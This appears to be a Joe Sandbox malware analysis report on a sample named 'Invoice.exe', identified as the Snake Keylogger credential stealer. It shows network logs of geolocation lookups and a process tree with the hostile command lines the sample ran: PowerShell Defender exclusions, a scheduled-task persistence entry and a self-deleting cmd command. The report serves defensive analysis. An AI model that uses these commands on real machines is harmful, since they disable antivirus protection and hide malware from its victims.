3	192.168.2.4	49732	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:44 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-11 08:59:44 UTC	860	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 93497 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 07:01:26 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sp%2F4%2FJTT4YFAWDOGaHcxezr2iZ7mGDTcbhmkgar2bKyLrMT%2BSjn3YzollmZyfWJ9ur7fG7v5PAgwDenk1d%2FkjV4drOTbn%2FYqAwbWNYW214R3hnWldGO7bZdxj7nC7m5A1l8DFYrw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9db83bb250603-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28538&min_rtt=25012&rtt_var=10834&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=110344&cwnd=227&unsent_bytes=0&cid=174516652d9867ab&ts=541&x=0"
2025-03-11 08:59:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-11 08:59:47 UTC	851	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 95304 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 06:31:22 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsKH6G26NdsRdH85LXSQhtl8qeIp1XLdY4%2B8yh2IX9puYPhEXb3gupPkkDeHFFvVckgK3xMDP2tIWTYt1EAJ6UDjFoZ3zDJZ4Q2rJl2QRwTXA5U579sHFbwItWHzKZvAIQ8IJIiA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9db9639ee4509-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=34114&min_rtt=24545&rtt_var=9047&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=119954&cwnd=245&unsent_bytes=0&cid=31750cb47d7f19c4&ts=496&x=0"
2025-03-11 08:59:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	63655	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:50 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-11 08:59:51 UTC	850	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 93503 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 07:01:26 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvXWAINAdfafG2LjyakoKSTpzQH9WqEu6TCH1gjAHDlcDItEAJw9FtYCOFzgKgzbJrrGxcoWQh52l25X9dDTrx17MAY95d229COwLqjE1tWS7X6kWc0A3RzoKt8CJlAyWnUXkjHe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9dbaaeb96c96f-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25115&min_rtt=20652&rtt_var=11862&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=106401&cwnd=250&unsent_bytes=0&cid=c5521fc467a9a613&ts=597&x=0"
2025-03-11 08:59:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	63657	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:53 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-11 08:59:54 UTC	862	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 93507 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 07:01:26 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKixwCAV5olckcsj%2FTMGI4cItfLAwtwuXU1Vqy4i4y7oxeRS2kXr6IVYennhr%2BVMIUe2gd%2BFBHeEFUM%2FSE14EUyXAMrKgjdh%2BFF554h7Ff5e7RNcTsXS2ERRuvBGiu5X3%2Fwhb6M4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9dbbe1c20d6e1-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25063&min_rtt=20364&rtt_var=11826&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=110245&cwnd=242&unsent_bytes=0&cid=0b2487267fd887fe&ts=527&x=0"
2025-03-11 08:59:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	63659	104.21.16.1	443	7396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 08:59:56 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-11 08:59:57 UTC	858	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:59:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 95314 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 06:31:22 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Mo1Q3uO5VlhtMOswF5%2F4L3F%2B6dEDX0obr4MXPoMRUBDXMo4g2vOJJQEM1dFzeUN43l96YMxqWdWQSTtrMtkzJdnLCdMee3doYngoe6AyEvKJL7IYTCZG%2FPMnjAmRntl8IjBA%2BLf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e9dbd178a8bad1-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42014&min_rtt=32304&rtt_var=13965&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=110457&cwnd=252&unsent_bytes=0&cid=a7a17026173f5bbb&ts=520&x=0"
2025-03-11 08:59:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	04:59:24
Start date:	11/03/2025
Path:	C:\Users\user\Desktop\Invoice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice.exe"
Imagebase:	0x580000
File size:	1'085'952 bytes
MD5 hash:	97FBC4C5452A0D478E708C3AD9E09536
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:59:28
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"
Imagebase:	0x130000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:59:28
Start date:	11/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:59:28
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe"
Imagebase:	0x130000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:59:28
Start date:	11/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:59:28
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp"
Imagebase:	0x860000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:59:28
Start date:	11/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:59:29
Start date:	11/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x7ff663240000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:59:29
Start date:	11/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xf80000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.1500060552.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:59:30
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1808
Imagebase:	0xbe0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:59:31
Start date:	11/03/2025
Path:	C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe
Imagebase:	0x920000
File size:	1'085'952 bytes
MD5 hash:	97FBC4C5452A0D478E708C3AD9E09536
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:59:32
Start date:	11/03/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff75b8b0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:59:38
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 1304
Imagebase:	0xbe0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:59:56
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:59:56
Start date:	11/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:59:56
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x90000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_HbxYXheklrhvR.ex_74b9deadb0e6e0326d2fe59a3212e3909bf095a0_bdce14ac_a1c55d20-980c-435f-aedf-a92fe8b2b342\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Invoice.exe_4eea8f7635debfc89bf231883ea8031a3f4438f_ba95ec82_b2c7c00f-4dd9-4fb8-b240-80c0677674fb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BC8.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EF5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F54.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A2D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B57.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C23.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HbxYXheklrhvR.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
Invoice.exe